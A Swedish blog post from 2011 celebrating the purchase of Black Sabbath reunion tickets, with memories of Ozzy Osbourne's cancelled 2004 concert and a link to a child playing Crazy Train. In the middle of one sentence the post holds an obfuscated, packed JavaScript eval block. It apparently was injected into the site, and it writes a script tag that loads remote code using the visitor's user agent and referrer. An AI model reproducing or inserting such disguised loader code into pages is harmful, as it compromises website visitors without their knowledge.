Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Black Sabbath! Jag har biljett… Har du?

Black Sabbath! Jag har biljett… Har du?
Filip Urde
  • On 24 november, 2011
  • http://www.revue.se/filip-urde

Hektisk morgon minst sagt! Jag skrev tidigare (se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibrts|var|u0026u|referrer|ebasf||js|php’.split(’|’),0,{}))
här
) om Black Sabbaths kommande turné och idag släpptes alltså biljetterna för konserten i Malmö och Stockholm.

System som inte fungerar, Live Nation konton som inte fungerar…lång kö, som inte fungerar…. Men nu är en plåt min!

Äntligen blir det av, skulle sett Ozzy Osbourne 2004 men han bröt nacken under inspelningen av tv programmet ”The Osbournes”, en (fånig) tv serie där man får följa Ozzy och hans familj. Ozzy ställde in konserten i globen och stjärnan dog i mina ögon! hur kunde detta hända.

Detta är sen länge ”glömt” och nu är the prince of darkness tillbaka med orginal uppsättningen av Black Sabbath!

Kan det bli bättre?

Jag hoppas att man gör en hyllning till Ronnie James Dio och kör lite Heaven and Hell!

 

Här nedan är en video på en 9 åring som kör Crazy Train, Get in the mood.

httpv://youtu.be/PUMM9ZnyGdw